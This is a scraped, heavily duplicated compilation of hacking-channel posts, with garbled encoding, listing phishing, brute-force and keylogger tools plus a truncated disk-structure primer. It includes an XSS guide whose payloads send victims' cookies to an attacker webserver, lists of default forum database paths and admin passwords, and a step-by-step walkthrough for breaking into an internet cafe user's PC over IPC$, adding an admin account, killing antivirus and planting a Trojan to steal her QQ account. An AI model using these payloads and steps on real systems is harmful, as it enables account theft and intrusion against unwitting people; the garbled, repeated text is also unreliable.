β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST ACTIVE ATTACKS 2020 :
instagram.com/UndercodeTesting
1. Phishing
One of the most insidious techniques used today is Phishing.Itβs hard to find the person that doesnβt know what phishing is. However a lot of users are still getting tricked by hackers on a daily basis.
Phishing implies the replication of the website with the aim of stealing money or personal information. And once a user enters his credit card details,for example, a hacker will have access to that data and will be able to use the received information for his own benefit.
2. Viruses and malicious code
Hackers can crawl almost into any website and leave in itsβ database malware or insert code into the websiteβs files. There is a huge variety of viruses, and each may impact the infected site differently. But there should be no doubt that a virus, regardless of its type, will not benefit your business.
3. UI Redress
This technique is similar to phishing. But in this case, a hacker would create a fake hidden user interface. Once the a user clicks the button with an intention of to proceed to a certain page, he will find himself on an unfamiliar website, usually with an inappropriate content.
4. Cookie Theft
With the help of a malicious software hackers can steal your browserβs cookies. And those cookies contain a lot of important information: browsing history, usernames and passwords. As you understand,that data can also contain logins and password to your websiteβs administratorβs panel.
5. Denial of Service (DoS\DDoS)
DDOS stands for Distributed Denial of Service. DDOS attack is a way to make a certain server unavailable or, in other words, a way to crash the server.
To interrupt or crash the server a hackers would use bots. Those bots soul purpose is to send requests to the website, a lot of requests. As a result, a server unable to process all of the received requests will simply crash. The most hazardous thing about this technique is that a hacker can crash the server in a relatively small amount of time
6. DNS spoofing
This malware is also known as DNS cache poisoning. It engages that old cache data you might have forgotten about.
Vulnerabilities in the domain name system allow hackers to redirect traffic from your website to a malicious one. Moreover, hackers can program this attack so the infected DNS server will infect another DNS and so on.
7. SQL injection
If your website has vulnerabilities in its SQL database or libraries, hackers can get access to your confidential information by deceiving the system.So there is no surprise that SQL injections can also be a simple tool. But this simple tool can allow a hacker to access vital information of your website.
8. Keylogger injection
The Keylogger that very simple and dangerous malicious code.
The malware records keystrokes , captures all of the userβs actions on the keyboard, and to send all that has been recorded to the hackern ; it also installs a malicious script that produces an in-browser cryptocurrency miner.
If a hacker succeeds in obtaining data, then the result of the hacking will be stolen admin credentials that can allow hackers to easily log into your website
9. Non-targeted website hack
In most cases, hackers donβt target a specific website. They are more interested in massive hacking.
It is easy to suffer from a non-targeted attack β you just need to overlook any CMS, plugin or template vulnerability. Any gap is a chance to get into the hackerβs sight and become a victim during the next attack.
Hackers can find websites with similar weaknesses easily. They can always use Googleβs Hacking Database to receive a list of vulnerable websites that have the same properties. For example, hackers can find all indexed websites that have a vulnerable plugin installed. Or websites with unhidden catalogues.
10. Brute force
A Brute Force Attack is the simple method to gain access to a website. It tries various combinations of the passwords again and again until it gets in. This repetitive action is like an army attacking a fort.
π¦MOST ACTIVE ATTACKS 2020 :
instagram.com/UndercodeTesting
1. Phishing
One of the most insidious techniques used today is Phishing.Itβs hard to find the person that doesnβt know what phishing is. However a lot of users are still getting tricked by hackers on a daily basis.
Phishing implies the replication of the website with the aim of stealing money or personal information. And once a user enters his credit card details,for example, a hacker will have access to that data and will be able to use the received information for his own benefit.
2. Viruses and malicious code
Hackers can crawl almost into any website and leave in itsβ database malware or insert code into the websiteβs files. There is a huge variety of viruses, and each may impact the infected site differently. But there should be no doubt that a virus, regardless of its type, will not benefit your business.
3. UI Redress
This technique is similar to phishing. But in this case, a hacker would create a fake hidden user interface. Once the a user clicks the button with an intention of to proceed to a certain page, he will find himself on an unfamiliar website, usually with an inappropriate content.
4. Cookie Theft
With the help of a malicious software hackers can steal your browserβs cookies. And those cookies contain a lot of important information: browsing history, usernames and passwords. As you understand,that data can also contain logins and password to your websiteβs administratorβs panel.
5. Denial of Service (DoS\DDoS)
DDOS stands for Distributed Denial of Service. DDOS attack is a way to make a certain server unavailable or, in other words, a way to crash the server.
To interrupt or crash the server a hackers would use bots. Those bots soul purpose is to send requests to the website, a lot of requests. As a result, a server unable to process all of the received requests will simply crash. The most hazardous thing about this technique is that a hacker can crash the server in a relatively small amount of time
6. DNS spoofing
This malware is also known as DNS cache poisoning. It engages that old cache data you might have forgotten about.
Vulnerabilities in the domain name system allow hackers to redirect traffic from your website to a malicious one. Moreover, hackers can program this attack so the infected DNS server will infect another DNS and so on.
7. SQL injection
If your website has vulnerabilities in its SQL database or libraries, hackers can get access to your confidential information by deceiving the system.So there is no surprise that SQL injections can also be a simple tool. But this simple tool can allow a hacker to access vital information of your website.
8. Keylogger injection
The Keylogger that very simple and dangerous malicious code.
The malware records keystrokes , captures all of the userβs actions on the keyboard, and to send all that has been recorded to the hackern ; it also installs a malicious script that produces an in-browser cryptocurrency miner.
If a hacker succeeds in obtaining data, then the result of the hacking will be stolen admin credentials that can allow hackers to easily log into your website
9. Non-targeted website hack
In most cases, hackers donβt target a specific website. They are more interested in massive hacking.
It is easy to suffer from a non-targeted attack β you just need to overlook any CMS, plugin or template vulnerability. Any gap is a chance to get into the hackerβs sight and become a victim during the next attack.
Hackers can find websites with similar weaknesses easily. They can always use Googleβs Hacking Database to receive a list of vulnerable websites that have the same properties. For example, hackers can find all indexed websites that have a vulnerable plugin installed. Or websites with unhidden catalogues.
10. Brute force
A Brute Force Attack is the simple method to gain access to a website. It tries various combinations of the passwords again and again until it gets in. This repetitive action is like an army attacking a fort.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦most 2020 phishing tools used by hackers
> on github
Infosec IQ
Gophish.
LUCY.
Simple Phishing Toolkit (sptoolkit)
Phishing Frenzy.
King Phisher.
SpeedPhish Framework (SPF)
Social-Engineer Toolkit (SET)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦most 2020 phishing tools used by hackers
> on github
Infosec IQ
Gophish.
LUCY.
Simple Phishing Toolkit (sptoolkit)
Phishing Frenzy.
King Phisher.
SpeedPhish Framework (SPF)
Social-Engineer Toolkit (SET)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST USED BRUTE FORCE TOOLS 2020
t.me/UndercodeTesting
1)Ophcrack for windows is an excellent option for brute forcing passwords and cracking.
http://ophcrack.sourceforge.net/
2) Brutus uses a technique called time memory trade off which allows for large multi-threaded brute forcing attacks all at once.
http://www.hoobie.net/brutus/
3) Cain and Able is not only a password cracker but and overall excellent network security tool.
> http://www.oxid.it/
4) John the Ripper is compatible with Linux, Unix and fully able to brute force Windows LM hashes. Although, John the Ripper is not directly suited to Windows. This software is extremely fast at brute force cracking Linux and Unix NTLM hashes.
> http://www.openwall.com/john/
5) Medusa is a variation of the THC Hydra cracking software. Medusa has many advantages by being a speedy parallel, modular and login brute forcing tool.
<> http://foofus.net/goons/jmk/medusa/medusa.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST USED BRUTE FORCE TOOLS 2020
t.me/UndercodeTesting
1)Ophcrack for windows is an excellent option for brute forcing passwords and cracking.
http://ophcrack.sourceforge.net/
2) Brutus uses a technique called time memory trade off which allows for large multi-threaded brute forcing attacks all at once.
http://www.hoobie.net/brutus/
3) Cain and Able is not only a password cracker but and overall excellent network security tool.
> http://www.oxid.it/
4) John the Ripper is compatible with Linux, Unix and fully able to brute force Windows LM hashes. Although, John the Ripper is not directly suited to Windows. This software is extremely fast at brute force cracking Linux and Unix NTLM hashes.
> http://www.openwall.com/john/
5) Medusa is a variation of the THC Hydra cracking software. Medusa has many advantages by being a speedy parallel, modular and login brute forcing tool.
<> http://foofus.net/goons/jmk/medusa/medusa.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦best 2020 keylogger -apps
pinterest.com/undercode_Testing
1) http://www.spyrix.com/spyrix-free-keylogger.php
2) https://kidinspector.com/
3) http://www.actualkeylogger.com/
4) https://store.payproglobal.com/r?u=https://www.refog.com&a=4913
5) https://www.iwantsoft.com/
6) https://kidlogger.net/?lang=en
8) https://www.logixoft.com/en-us/index
9) https://www.ardamax.com/keylogger/ free
10) https://sourceforge.net/projects/basickeylogger/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦best 2020 keylogger -apps
pinterest.com/undercode_Testing
1) http://www.spyrix.com/spyrix-free-keylogger.php
2) https://kidinspector.com/
3) http://www.actualkeylogger.com/
4) https://store.payproglobal.com/r?u=https://www.refog.com&a=4913
5) https://www.iwantsoft.com/
6) https://kidlogger.net/?lang=en
8) https://www.logixoft.com/en-us/index
9) https://www.ardamax.com/keylogger/ free
10) https://sourceforge.net/projects/basickeylogger/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) On the remote attacker machine, start the webserver (Apache2 in example):
> sudo service apache2 start
2) Git clone the repo locally and then push the chosen "Cookie stealer" PHP script from local host to the attacking machine
git clone https://github.com/RxSec/CookieHeist
3) cd CookieHeist
sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/
4) sudo scp log.txt username@AttackMachine:/var/www/html/
π¦AWS Version:
scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.
sudo mv cookiestealer-simple.php /var/www/html/
Example: http://[Attacker Webserver]/cookiesteal-simple.php
π¦Setting Permissions:
Figure out which user is owning httpd process using the following command:
ps aux | grep httpd
Output should be similar to this:
ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd
So now you know the user who is trying to write files, which is in this case ec2-user You can now go ahead and set the permission for directory where your php script is trying to write something:
sudo chown ec2-user:ec2-user /var/www/html/
sudo chmod 755 /var/www/html/
XSS Payload Examples:
<script javascript:text>document.location="http://[Attacker Webserver]cookiesteal-simple.php?c=" + document.cookie + "&t=Alert"; </script>
<script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
<img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) On the remote attacker machine, start the webserver (Apache2 in example):
> sudo service apache2 start
2) Git clone the repo locally and then push the chosen "Cookie stealer" PHP script from local host to the attacking machine
git clone https://github.com/RxSec/CookieHeist
3) cd CookieHeist
sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/
4) sudo scp log.txt username@AttackMachine:/var/www/html/
π¦AWS Version:
scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.
sudo mv cookiestealer-simple.php /var/www/html/
Example: http://[Attacker Webserver]/cookiesteal-simple.php
π¦Setting Permissions:
Figure out which user is owning httpd process using the following command:
ps aux | grep httpd
Output should be similar to this:
ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd
So now you know the user who is trying to write files, which is in this case ec2-user You can now go ahead and set the permission for directory where your php script is trying to write something:
sudo chown ec2-user:ec2-user /var/www/html/
sudo chmod 755 /var/www/html/
XSS Payload Examples:
<script javascript:text>document.location="http://[Attacker Webserver]cookiesteal-simple.php?c=" + document.cookie + "&t=Alert"; </script>
<script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
<img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The default database of various website programs :
t.me/UndercodeTesting
Dynamic network:
default database
/data/dvbbs7.mdb
backup database
/databackup/dvbbs7.mdb
foreground:
user name: admin
password: admin888
background:
user name: admin
password: admin888
οΌοΌοΌοΌοΌοΌοΌοΌοΌοΌοΌοΌοΌ -
BBSXP:
default database
database / bbsxp.mdb
_______________
LeadBBS
default database
Data / LeadBBS.mdb
username: Admin
password: admin
_______________
6kbbs
default database
db / 6k.asp
username: admin
password: 6kadmin
------- ----------------------------------
data / dvbbs7.mdb Dongwang forum database
Foreground: username: admin password: admin888
background: username: admin password: admin888
/databackup/dvbbs7.mdb;
dongwang forum database /
bbs / databackup / dvbbs7.mdb dongwang forum database / data / zm_marry.asp ized database
/admin/data/qcdn_news.mdb Chong Qing article management system database
/data/qcdn_news.mdb; Chong Qing article management system database
/firend.mdb Dating Service database
/database/newcloud6.mdb new cloud database management system 6.0
/ database /% 23newasp.mdb new cloud website system / database / powereasy4.mdb Dongyi
website management system 4.03 database /
blogdata / l-blog.mdb l-blog v1.08
database
/ database / bbsxp.mdb bbsxp forum database / bbs / database /bbsxp.mdb bbsxp forum database /
access / sf2.mdb snowman forum program v2.0 database / data /
leadbbs.mdb leadbbs forum v3.14 database
username: admin password: admin
/bbs/data/leadbbs.mdb leadbbs forum v3.14 database /
bbs / access / sf2.mdb snowman forum program v2.0 database
/ blog / blogdata / l-blog.mdb l-blog v1.08 database /
fdnews.asp Liuhe dedicated bbs database
/ bbs / fdnews.asp Liuhe dedicated bbs database /
admin / ydxzdate.asa raindrop download system v2.0 + sp1 database
/ data /
down.mdb Download system xp v1.3 database / database / database.mdb
Xuanxi download system v3.1 database /
db / xzjddown.mdb lhdownxp download system database /
db / play.asp Entertainment Pioneer Forum v3.0 database /
mdb.asp Jingyun Download system v1.2 database
/admin/data/user.asp shock cloud download system v3.0 database
/data_jk/joekoe_data.asp Joe off 6.0 database
/data/news3000.asp boiling outlook news system v1.1 database
/ data / appoen .mdb Huixin News System 4.0 Database / data /
12912.asp Flying Dragon Article Management System v2.1 Database
/database.asp Dynamic Needs Download Management System v3.5
/download.mdb Aberdeen Software Download Management System v2.3
/dxxobbs/mdb/dxxobbs.mdb dxxobbs Forum Database
db / 6k.asp 6kbbs Username: admin Password: 6kadmin
/ database / snowboy.mdb Snow boy forum default background admin / admin_index.asp
/database/#mmdata.mdb Yishuang community /
starark.asp poor dragon asp website generation system
written by Under code
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The default database of various website programs :
t.me/UndercodeTesting
Dynamic network:
default database
/data/dvbbs7.mdb
backup database
/databackup/dvbbs7.mdb
foreground:
user name: admin
password: admin888
background:
user name: admin
password: admin888
οΌοΌοΌοΌοΌοΌοΌοΌοΌοΌοΌοΌοΌ -
BBSXP:
default database
database / bbsxp.mdb
_______________
LeadBBS
default database
Data / LeadBBS.mdb
username: Admin
password: admin
_______________
6kbbs
default database
db / 6k.asp
username: admin
password: 6kadmin
------- ----------------------------------
data / dvbbs7.mdb Dongwang forum database
Foreground: username: admin password: admin888
background: username: admin password: admin888
/databackup/dvbbs7.mdb;
dongwang forum database /
bbs / databackup / dvbbs7.mdb dongwang forum database / data / zm_marry.asp ized database
/admin/data/qcdn_news.mdb Chong Qing article management system database
/data/qcdn_news.mdb; Chong Qing article management system database
/firend.mdb Dating Service database
/database/newcloud6.mdb new cloud database management system 6.0
/ database /% 23newasp.mdb new cloud website system / database / powereasy4.mdb Dongyi
website management system 4.03 database /
blogdata / l-blog.mdb l-blog v1.08
database
/ database / bbsxp.mdb bbsxp forum database / bbs / database /bbsxp.mdb bbsxp forum database /
access / sf2.mdb snowman forum program v2.0 database / data /
leadbbs.mdb leadbbs forum v3.14 database
username: admin password: admin
/bbs/data/leadbbs.mdb leadbbs forum v3.14 database /
bbs / access / sf2.mdb snowman forum program v2.0 database
/ blog / blogdata / l-blog.mdb l-blog v1.08 database /
fdnews.asp Liuhe dedicated bbs database
/ bbs / fdnews.asp Liuhe dedicated bbs database /
admin / ydxzdate.asa raindrop download system v2.0 + sp1 database
/ data /
down.mdb Download system xp v1.3 database / database / database.mdb
Xuanxi download system v3.1 database /
db / xzjddown.mdb lhdownxp download system database /
db / play.asp Entertainment Pioneer Forum v3.0 database /
mdb.asp Jingyun Download system v1.2 database
/admin/data/user.asp shock cloud download system v3.0 database
/data_jk/joekoe_data.asp Joe off 6.0 database
/data/news3000.asp boiling outlook news system v1.1 database
/ data / appoen .mdb Huixin News System 4.0 Database / data /
12912.asp Flying Dragon Article Management System v2.1 Database
/database.asp Dynamic Needs Download Management System v3.5
/download.mdb Aberdeen Software Download Management System v2.3
/dxxobbs/mdb/dxxobbs.mdb dxxobbs Forum Database
db / 6k.asp 6kbbs Username: admin Password: 6kadmin
/ database / snowboy.mdb Snow boy forum default background admin / admin_index.asp
/database/#mmdata.mdb Yishuang community /
starark.asp poor dragon asp website generation system
written by Under code
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 3389 port detailed - Why used for hack ?
youtube.com/undercode
3389 originally refers to the 3389 port of the computer, which is generally used to refer to the remote desktop and can be modified. It is not a Trojan horse program, but if not necessary, the hacker base recommends shutting down the service. Originally refers to the 3389 port of the computer
π¦ 3389 port detailed - Why used for hack ?
youtube.com/undercode
3389 originally refers to the 3389 port of the computer, which is generally used to refer to the remote desktop and can be modified. It is not a Trojan horse program, but if not necessary, the hacker base recommends shutting down the service. Originally refers to the 3389 port of the computer
YouTube
UNDERCODE
FREE AI & CYBERSECURITY TRICKS & MALWARE ANALYSIS HACKS, DAILY MEMES & MINDβBENDING TECH MYSTERIESβ¦ ALL ON UNDERCODE!
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
π¦ Because it belongs to the initial port of the remote desktop of WINDOWS [can be modified]
3389 is generally used to refer to the remote desktop
Microsoft's remote desktop is set up to facilitate the majority of computer administrators to remotely manage their own computers,
But as long as there is a management password, 3389 can provide services for anyone with a management password ...
Most hackers like to open a 3389 on the chicken,
Because 3389 is the normal service of the system, it is also very convenient to use.
It can achieve the same effect as the remote control software such as Grey Pigeon, the main thing is that it is a normal service ...
3389 is easy to get through various scanning tools (such as superscan \ x-scan, etc.). Because some computer users lack security awareness, they often leave the administrator \ new account password blank, so rookies can use mstsc.exe to log in to others in GUI mode In order to prevent others from using 3389 to log in to the computer, it is best to set a password for each account or close the port with a firewall. 3389 is recommended to close.
π¦To close port 3389:
Firstly, port 3389 is the port opened by the remote management terminal of windows. It is not a Trojan horse program. Please first determine whether the service is opened by yourself. If it is not necessary, it is recommended to close the service.
win8 server start-> program-> management tools-> find Terminal Services service item in the service, select the property option to change the startup type to manual, and stop the service.
win8 start-> Settings-> Control Panel-> Administrative Tools-> find Terminal Services service item in the service, select the property option to change the startup type to manual, and stop the service.
π¦How to close windows Right-click on my computer and select Properties-> Remote, and remove the ticks in the two options box of Remote Assistance and Remote Desktop.
Close port 3389 through the registry
start operation
Enter regedit to open the registry
[HKEY_LOCAL_MACHINE \ System \ control \ Terminalserver \ wds \ rdpwd \ tds \ tcp branch, select the key value named portnumber, and change its 3389 to other (such as 1234). Look at my operation. There are 2 controls, namely controlSET001 and controlSET002. One by one advanced controlSET001 then controlSET002
Below we are looking at currentcontrolset
[HKEY_LOCAL_MACHINE \ System \ currentcontrolset \ control \ Terminalserver \ winstations \ RDP-Tcp \ PortNumber branch should have one or many similar subkeys, the same change his value 3389 to other (such as 1234)
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
3389 is generally used to refer to the remote desktop
Microsoft's remote desktop is set up to facilitate the majority of computer administrators to remotely manage their own computers,
But as long as there is a management password, 3389 can provide services for anyone with a management password ...
Most hackers like to open a 3389 on the chicken,
Because 3389 is the normal service of the system, it is also very convenient to use.
It can achieve the same effect as the remote control software such as Grey Pigeon, the main thing is that it is a normal service ...
3389 is easy to get through various scanning tools (such as superscan \ x-scan, etc.). Because some computer users lack security awareness, they often leave the administrator \ new account password blank, so rookies can use mstsc.exe to log in to others in GUI mode In order to prevent others from using 3389 to log in to the computer, it is best to set a password for each account or close the port with a firewall. 3389 is recommended to close.
π¦To close port 3389:
Firstly, port 3389 is the port opened by the remote management terminal of windows. It is not a Trojan horse program. Please first determine whether the service is opened by yourself. If it is not necessary, it is recommended to close the service.
win8 server start-> program-> management tools-> find Terminal Services service item in the service, select the property option to change the startup type to manual, and stop the service.
win8 start-> Settings-> Control Panel-> Administrative Tools-> find Terminal Services service item in the service, select the property option to change the startup type to manual, and stop the service.
π¦How to close windows Right-click on my computer and select Properties-> Remote, and remove the ticks in the two options box of Remote Assistance and Remote Desktop.
Close port 3389 through the registry
start operation
Enter regedit to open the registry
[HKEY_LOCAL_MACHINE \ System \ control \ Terminalserver \ wds \ rdpwd \ tds \ tcp branch, select the key value named portnumber, and change its 3389 to other (such as 1234). Look at my operation. There are 2 controls, namely controlSET001 and controlSET002. One by one advanced controlSET001 then controlSET002
Below we are looking at currentcontrolset
[HKEY_LOCAL_MACHINE \ System \ currentcontrolset \ control \ Terminalserver \ winstations \ RDP-Tcp \ PortNumber branch should have one or many similar subkeys, the same change his value 3389 to other (such as 1234)
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing
>There are many Internet cafe management software, but most of them have one or another loophole, so there are many techniques for cracking Internet cafe software and Internet cafe software,
>you can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most severe places for loss of virtual property. But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It is a little complicated. The hacker base is mainly to let you know some commands used during hacking.
π¦ππΌπ'π πππΈβπ :
The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.
> Step 2: With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use Windows 2000 that has not been patched, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .
> After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer" ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).
-Step 3: Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.
net user user20 / add
net localgroup administrators user20 / add
-Step 4: Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as another user" window pops up, enter "user20" and press Enter.
-Step 5: Log in to the MM computer with telnet 192.168.0.20, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.
-Step 6: You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.
π¦ With a Trojan, you can naturally know the QQ number used by MM.
How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing
>There are many Internet cafe management software, but most of them have one or another loophole, so there are many techniques for cracking Internet cafe software and Internet cafe software,
>you can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most severe places for loss of virtual property. But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It is a little complicated. The hacker base is mainly to let you know some commands used during hacking.
π¦ππΌπ'π πππΈβπ :
The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.
> Step 2: With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use Windows 2000 that has not been patched, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .
> After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer" ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).
-Step 3: Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.
net user user20 / add
net localgroup administrators user20 / add
-Step 4: Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as another user" window pops up, enter "user20" and press Enter.
-Step 5: Log in to the MM computer with telnet 192.168.0.20, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.
-Step 6: You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.
π¦ With a Trojan, you can naturally know the QQ number used by MM.
How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Basic knowledge of data record recovery
t.me/UndercodeTesting
π¦ Let's start with the data structure of the hard disk.
Hard disk data structure
We have no way to use a hard disk when we first buy it. You need to partition and format it, and then install the operating system before you can use it. Take the 9x / Me series that we have been using until now, we generally divide the hard disk into five parts: the main boot sector, the operating system boot sector, FAT, DIR and Data (of which only the main boot sector is the only one , The others increase with the number of your partitions).
Master boot sector
The main boot sector is located on track 0 cylinder 0 cylinder 1 sector of the entire hard disk, including the hard disk main boot record MBR (Main Boot Record) and partition table DPT (Disk Partition Table). The role of the master boot record is to check whether the partition table is correct and determine which partition is the boot partition, and transfer the startup program of the partition (that is, the operating system boot sector) to the memory for execution at the end of the program. As for the partition table, many people know that starting with 80H or 00H and ending with 55AAH, a total of 64 bytes, is located at the very end of the sector. It is worth mentioning that the MBR is generated by a partition program (such as Fdisk.exe for DOS), and this sector may be different for different operating systems. If you have this intention, you can write one yourself, as long as it can complete the aforementioned tasks, which is why you can achieve multi-system startup A lot of boot sector viruses).
Operating system boot sector
OBR (OS Boot Record) is the boot sector of the operating system, usually located on the 0 track 1 cylinder 1 sector of the hard disk (this is for DOS, for those systems that boot in multiple boot mode are located in the corresponding primary partition The first sector of the extended partition) is the first sector that the operating system can directly access. It also includes a boot program and a partition parameter record table called BPB (BIOS Parameter Block). In fact, each logical partition has an OBR, and its parameters vary depending on the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the root directory of the partition are the boot files of the operating system (such as MSDOS or IO.SYS and MSDOS.SYS of Win9x / Me originating from MSDOS). If so, the first file is read into memory and control is given to the file. The BPB parameter block records the start sector, end sector, file storage format, hard disk media descriptor, root directory size, FAT number, size of allocation unit (also known as cluster) in the partition, etc. Important parameters. OBR is generated by an advanced formatter (eg Format.com for DOS).
File allocation table
FAT (File Allocation Table) is the file allocation table of DOS / Win9x system. For data security, FAT generally do two, the second FAT is the backup of the first FAT, the FAT area is immediately after the OBR , The size of which is determined by the size of the partition and the size of the file allocation unit. There are always many choices about the format of FAT. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but there is no other format of FAT other than this, like Windows NT, OS / 2, UNIX / Linux, Novell Etc. have their own file management methods.
π¦ Basic knowledge of data record recovery
t.me/UndercodeTesting
π¦ Let's start with the data structure of the hard disk.
Hard disk data structure
We have no way to use a hard disk when we first buy it. You need to partition and format it, and then install the operating system before you can use it. Take the 9x / Me series that we have been using until now, we generally divide the hard disk into five parts: the main boot sector, the operating system boot sector, FAT, DIR and Data (of which only the main boot sector is the only one , The others increase with the number of your partitions).
Master boot sector
